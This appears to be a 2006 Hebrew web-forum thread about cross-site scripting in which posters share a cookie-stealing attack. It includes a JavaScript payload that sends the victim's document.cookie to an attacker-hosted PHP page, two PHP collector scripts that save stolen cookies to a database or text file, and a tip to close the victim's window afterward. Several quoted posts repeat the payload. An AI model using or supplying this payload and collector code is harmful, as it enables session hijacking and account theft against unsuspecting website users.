לחץ כאן
ראשי > אבטחת מידע > משהו על XSS
קוד:"document.location=’http://www.example.com/xss.php?cookie=’document.cookie"
ואז קובץ ה-PHP יאחסן את הערך של ה-Cookie במסד נתונים או קובץ טקסט.[ההודעה נערכה על-ידי MasterBlaster ב-29/08/2006 12:26:14]
מה שמים במקום הדוגמה..?
אתה הכתובת של הקובת asp/php או את הקובץ טקסט..?
מה שמים במקום הדוגמה..?
אתה הכתובת של הקובת asp/php או את הקובץ טקסט..?
את example.com תחליף ב-Domain כלשהו שיש לך יכולת להעלות אליו קבצי קוד ב-PHP/ASP. קובץ PHP שמבצע את העבודה נראה בערך כך:
קוד:<?
$Cookie = $_GET["cookie"];
$Link = mysql_connect (’localhost’,’user’,’password’);
if (! $Link)
die (mysql_error());
mysql_select_db (’test’) || die (mysql_error());
$Query = ’INSERT INTO Cookies VALUES’ . $Cookie;
mysql_query ($Query);
mysql_close ($Link);
?>
לא בדקתי את הקוד, וכבר הרבה זמן שלא יצא לי לשבת על PHP, אבל בכל זאת נראה לי שזה יעבוד.[ההודעה נערכה על-ידי MasterBlaster ב-29/08/2006 12:52:29]
מי שירצה, יוכל לחפש ולדעת (כמו שעשיתם אתם)
אבל שוב- כל הכבוד על ההשקעה.
קוד:"document.location=’http://www.example.com/xss.php?cookie=’document.cookie"
ואז קובץ ה-PHP יאחסן את הערך של ה-Cookie במסד נתונים או קובץ טקסט.
[ההודעה נערכה על-ידי MasterBlaster ב-29/08/2006 12:26:14]
אבל רואים את זה בפבפן היה לי פעם דקריפט שלא היום רואים תשורה בדפדפן
אבל הסקריפט נאבד לי ואני לא זוכר אותו בעל פה מישהוא יכול לעזור?
קוד:
<?php
$cookie1 = $_GET[’cookie’];
$textfile = fopen("cookie.txt", "a+");
fputs($textfile, $cookie1."\n\r");
fclose($textfile);
?>
bla.php?cookie=the.cookie
את "the cookie" הוא מכניס לתוך cookie.txt על השרת
רואיחם שהגודל שלו הישתנה אבל לא רשום כלום
קוד:"document.location=’http://www.example.com/xss.php?cookie=’document.cookie"
ואז קובץ ה-PHP יאחסן את הערך של ה-Cookie במסד נתונים או קובץ טקסט.
[ההודעה נערכה על-ידי MasterBlaster ב-29/08/2006 12:26:14]
אבל רואים את זה בפבפן היה לי פעם דקריפט שלא היום רואים תשורה בדפדפן
אבל הסקריפט נאבד לי ואני לא זוכר אותו בעל פה מישהוא יכול לעזור?
אם אתה רוצה אתה יכול להוסיף אחרי השורה הזאת את:
קוד:window.close();
ואז החלון של הדפדפן יסגר בכל פעם שמישהו יכנס אליו.[ההודעה נערכה על-ידי MasterBlaster ב-01/09/2006 16:07:24]
הרצאה או משהוא כדאי שכולם ידעו
זה בין הנושאים שהכי הרבה כותבים עליוו.. [ממה שראיתי] [בעברית]
יש באחד גליונות IKP על זה גם..
אני לא ארחיב יותר מזה, מי שרוצה.. Should go GOOGLE IT.